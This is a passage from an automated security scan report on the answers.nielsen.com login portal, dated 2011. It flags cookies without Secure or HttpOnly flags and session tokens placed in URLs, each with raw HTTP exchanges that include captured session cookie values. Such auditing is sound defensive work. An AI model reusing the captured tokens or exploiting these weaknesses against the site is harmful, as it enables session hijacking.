Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1026
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.._.....n....4...........D..$......z.\.....<..\..|..4..,...~.l..$......~....\..4..,...v.......$.....T.....|...~.d..<..4........V.\.........\...........s.......s..t|........... ........|..`......
...[SNIP]...

2.15. https://answers.nielsen.com/gateway/images/icons/icon_status_user_error_sm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/icons/icon_status_user_error_sm.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/icons/icon_status_user_error_sm.gif HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:38 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 155
Last-Modified: Sat, 30 Oct 2010 02:13:52 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/gif

GIF89a........kk.......11..........!.......,........@.`x.*.,6..p.....`....T.Pq.@.E!..$d.%.T.8.M....F%A.Tp.B...7.M.U....Y....ViJq..ex..D.....cD..^.....    .;

2.16. https://answers.nielsen.com/gateway/logon.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630 HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:35 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16331


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...

2.17. https://answers.nielsen.com/gateway/support/support.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/support/support.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/support/support.jsp HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:39 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48934


<html>
<head>
<title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333;
}

bo
...[SNIP]...

2.18. https://answers.nielsen.com/portal/site/answers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/site/answers HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:40 GMT
Server: Apache
Cache-Control: no-store
Location: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers
Content-Length: 508
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://answers.nielsen.com/gateway/logon.htm?T
...[SNIP]...

3. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. https://answers.nielsen.com/gateway/authValidation.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/authValidation.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gateway/authValidation.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; answers_cookie=R907182360; USER_EMAIL_REJECT=Client ID

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:32 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Location: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Set-Cookie: GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 447

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://answers.nielsen.com/gateway/logon.htm&#59;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630">http://answers.nielsen.com/gateway/logon.htm&#59;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630</a>
...[SNIP]...

3.2. https://answers.nielsen.com/gateway/forgottenPassword.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/forgottenPassword.htm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /gateway/forgottenPassword.htm;GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:27:33 GMT
Server: Apache
Cache-Control: no-cache
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14409


<html>
   <head>
       <title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size:
...[SNIP]...

3.3. https://answers.nielsen.com/gateway/logon.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630 HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; answers_cookie=R907182360; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:35 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16331


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 18 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://answers.nielsen.com/gateway/authValidation.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/authValidation.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gateway/authValidation.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; answers_cookie=R907182360; USER_EMAIL_REJECT=Client ID

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:32 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Location: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Set-Cookie: GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 447

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://answers.nielsen.com/gateway
...[SNIP]...

4.2. https://answers.nielsen.com/gateway/forgottenPassword.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/forgottenPassword.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gateway/forgottenPassword.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:26:42 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14488


<html>
   <head>
       <title>Nielsen Answers</title>
<style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
font-size:
...[SNIP]...

4.3. https://answers.nielsen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:45 GMT
Server: Apache
Cache-Control: no-store
Location: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2f
Content-Length: 485
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://answers.nielsen.com/gateway/logon.htm?T
...[SNIP]...

4.4. https://answers.nielsen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:44 GMT
Server: Apache
Last-Modified: Mon, 10 May 2010 13:49:22 GMT
ETag: "94462-47e-4863dad17fc80"
Accept-Ranges: bytes
Content-Length: 1150
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/x-icon

............ .h.......(....... ..... .......................................................e...W...a........................................D..u...]...v...~...........t...K........<..................
...[SNIP]...

4.5. https://answers.nielsen.com/gateway/forms/login.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/forms/login.fcc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /gateway/forms/login.fcc HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Content-Length: 179
Cache-Control: max-age=0
Origin: http://www.nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118

clienlogininput=Client+ID&clientloginpwd=password&USER=Client+ID&PASSWORD=password&partner=&realm=&target=https%3A%2F%2Fanswers.nielsen.com%2Fportal%2Fsite%2Fanswers&submit=submit

Response

HTTP/1.1 302 Found
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:24:30 GMT
Server: Apache
Set-Cookie: USER_EMAIL_REJECT=Client ID; path=/; domain=.nielsen.com
Cache-Control: no-store
Location: /gateway/authValidation.htm
Content-Length: 211
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/gateway/authValidation.htm">here</a>.</p>
</bo
...[SNIP]...

4.6. https://answers.nielsen.com/gateway/images/answers_ui/acnimage.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/acnimage.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/acnimage.jpg HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/support/support.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:36:23 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 2510
Last-Modified: Sat, 30 Oct 2010 02:13:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.............C.........................    ....................!........."$".$.......C.......................................................................9...."..............................
...[SNIP]...

4.7. https://answers.nielsen.com/gateway/images/answers_ui/bg_login.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/images/answers_ui/bg_login.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/images/answers_ui/bg_login.png HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
